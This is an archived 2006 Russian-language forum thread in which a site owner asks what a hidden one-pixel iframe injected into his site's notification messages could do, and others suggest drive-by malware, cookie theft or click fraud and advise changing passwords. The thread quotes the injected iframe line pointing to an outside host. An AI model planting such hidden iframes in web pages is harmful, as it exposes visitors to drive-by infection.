Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Пытались хакнуть (https://forum.antichat.xyz/showthread.php?t=22230)

CraZy I izzi 03.08.2006 20:13

Пытались хакнуть
 
Здрасти) у меня на сайте была обнаружена вот такая строчка

Код:

<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
вставлена она была в формы с текстом отсылаемые юзерам при новом ПМ или о письме с \"Обратной связи\" ...

Какие последствия могут быть? И чего мог добиться хакер?

Спасибо)

Rebz 03.08.2006 20:15

знакомая строчка.
такая приписывалась с слоите RST помоему..для IPB 2.1.6..

CraZy I izzi, последствия мы можем только гадать. Скорее всего кража кукисов..

CraZy I izzi 03.08.2006 20:21

мдя)) не повезло мне))

что посоветуете делать? чтоб такого больше не произашло?

max_pain89 03.08.2006 20:22

я конечно не специалист, но я не смог бы с помощью фрейма без явы спереть куки, а вот троянчик закачать через сплойт к ослу вполне возможно

Rebz 03.08.2006 20:26

нда, макс дело говорит...

что делать? Ну наверно сменить пароль на всякий пожарный. И забанить по Ip чела -)

CraZy I izzi 03.08.2006 20:29

эти меры уже приняты ..

может ещё что посаветуете? или где можно почитать инфу об этом?

Rebz 03.08.2006 20:35

https://forum.antichat.ru/showpost.php?p=175930&postcount=3
гм.. разные adv, но смысл тот же..
Молодец, правильно все делаешь.

genom-- 03.08.2006 20:40

ищи дырку както уж он вставил это---- а насчет последствий мож просто клики на вас зарабатывал =)

podkashey 04.08.2006 03:26

Цитата:

<iframe src=\"http://zabywjwzlr.biz/dl/adv448.php\" width=1 height=1></iframe>
Очень похоже на ссылку, которая ставится для юзания дыр ИЕ и установки тул-бара дополнительного, спайвэа и тд.... ИМХО, это она и есть...

Цитата:

а на будущее счобы не спрашивать что он мог сделать открой по сслыке скрипт-- без выполнения или слей его качалкой-- и позырь что он делает
Надо порсто весь сайт выкачивать, потом полазить по файлам и найти все пароли. Все настоящие хакеры так делают!!! ;)

Rebz 04.08.2006 10:00

dinar_007, прекрати флеймить..

ребят, вы хоть видели, что там даже сайта нет?

"Fedora Core Test Page"

Побоялись зайти?)


Время: 00:26